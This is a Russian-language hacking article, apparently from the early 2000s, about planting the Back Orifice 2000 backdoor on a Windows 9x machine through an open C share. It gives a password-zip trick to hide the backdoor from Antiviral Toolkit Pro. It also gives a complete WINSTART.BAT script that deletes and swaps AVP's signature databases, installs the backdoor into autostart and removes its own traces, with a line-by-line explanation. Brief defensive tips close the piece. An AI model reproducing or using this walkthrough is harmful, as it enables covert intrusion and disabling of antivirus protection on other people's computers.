Данный метод работает только на Windows 9x русских версиях (для английских версий необходимо подправить каталог автозапуска), а также при инсталляции Antiviral Toolkit Pro в c:\program files\antiviral toolkit pro\ (по умолчанию).

Рассмотрим следующую ситуацию: есть хост, имеющий общий ресурс С с полным доступом, установленным Antiviral Toolkit Pro. Как положить на него backdoor? Для этого надо заархивировать с паролем (BackdooR) сервер бакдора (будем использовать Back Oriffice 2000). Пароль используется для того, чтобы AVP сканер не смог обнаружить сервер бакдора:

>PKZIP.EXE -a -sBackooR asyslg.dll BO2K.EXE

Теперь AVP не сможет увидеть сигнатуры BO2k в ASYSLG.DLL (если установлена опция проверки архивов).

Затем необходимо обеспечить запуск сервера и обезвредить AVP. Для этого напишем BAT-файл:

@echo off attrib -R c:\progra~1\antivi~1\backdoor.avc >nul attrib -R c:\progra~1\antivi~1\trojan.avc >nul del c:\progra~1\antivi~1\backdoor.avc >nul del c:\progra~1\antivi~1\trojan.avc >nul copy c:\progra~1\antivi~1\macro.avc c:\progra~1\antivi~1\backdoor.avc >nul copy c:\progra~1\antivi~1\mail.avc c:\progra~1\antivi~1\trojan.avc >nul c:\windows\pkunzip.exe -e -sBackdooR c:\windows\ASYSLG.DLL C:\Windows\ГЛАВНО~1\ПРОГРА~1\АВТОЗА~1\ >nul del c:\windows\pkunzip.exe >nul del c:\windows\asyslg.dll >nul del c:\winstart.bat >nul echo on

Расшифровка построчно:

отключение вывода на экран выполняемых команд

снятие атрибута READONLY с файла backdoor.avc (база сигнатур для бакдоров)

снятие атрибута READONLY с файла tojan.avc (база сигнатур для троянов)

удаление файла backdoor.avc

удаление файла tojan.avc

подмена базы (для того, чтобы при запуске сканера AVP не ругался)

подмена базы (отсутствие базы)

разархивация бакдора и помещение его автозагрузку

удаление PKUNZIP

удаление архива с бакдором

удаление файлы запуска

Почему это будет работать? Потому что при старте Windows если в главном каталоге находится файл WINSTART.BAT он запускается на выполнение. При этом пользователь не увидит ни одного сообщения. Затем необходимо скопировать на удаленный компьютер следующие файлы:

ASYSLG.DLL в директорию c:\windows\

PKUNZIP.EXE в директорию c:\windows\

WINSTART.BAT в директорию c:\

Итого необходимо будет закачать 86.508 байт.

Все. После перезагрузки на компьютере из автозагрузки запустится сервер, удалит себя оттуда и запишет себя в c:\windows\system\ (сервер должен быть сконфигурирован на удаление оригинального файла). В принципе, можно использовать архиватор CAB, и проводить распаковывание программой EXTRACT.EXE, которая присутствуют на почти всех компьютерах, что позволит уменьшить размер перекачиваемых данных, однако данный архиватор не позволяет архивировать с паролем, что может привести к обнаружению сервера бакдора сканером (если включена опция проверки архивов).

Рекомендации по защите от данного вида атаки:

Закройте все общие ресурсы! Если вы без них жить не можете установите на них пароль (не менее 6 символов и не менее 1 спецсимвола).

Поставьте себе Firewall. Даже если эта атака пройдет успешной, получить доступ к вашей системе не удастся - Firewall вас сразу же предупредит о попытке проникновения. Я рекомендую Tiny Personal Firewall. При обнаружении и внезапной пропажи каких-то файлов сразу проверяйте свои диски антивирусом, а также проводите профилактическое сканирование дисков не менее одного раза в неделю.